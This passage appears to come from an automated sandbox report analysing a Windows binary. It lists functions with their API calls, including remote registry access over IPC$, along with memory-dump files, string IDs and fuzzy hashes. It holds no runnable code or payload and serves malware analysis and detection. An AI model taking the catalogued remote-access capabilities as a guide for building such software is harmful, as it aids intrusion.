                                                                                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                    Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                    Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3218148540-0
                                                                                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                    Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 136442275-0
                                                                                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                    Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • _wcstok.LIBCMT ref: 004674FF
                                                                                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                    • _wcstok.LIBCMT ref: 004675B2
                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                    • _wcslen.LIBCMT ref: 00467793
                                                                                                                    • _wcscpy.LIBCMT ref: 00467641
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • _wcslen.LIBCMT ref: 004677BD
                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 3104067586-3081909835
                                                                                                                    • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                    • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                    Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                    Strings
                                                                                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 440038798-2785691316
                                                                                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                    Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                    • _wcslen.LIBCMT ref: 004610A3
                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                    • String ID: ThumbnailClass
                                                                                                                    • API String ID: 4136854206-1241985126
                                                                                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                    Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                    • String ID: 2
                                                                                                                    • API String ID: 1331449709-450215437
                                                                                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                    Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                    • API String ID: 3054410614-2561132961
                                                                                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                    Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 600699880-22481851
                                                                                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                    Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroyWindow
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 3375834691-2160076837
                                                                                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                    Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                    • API String ID: 2907320926-3566645568
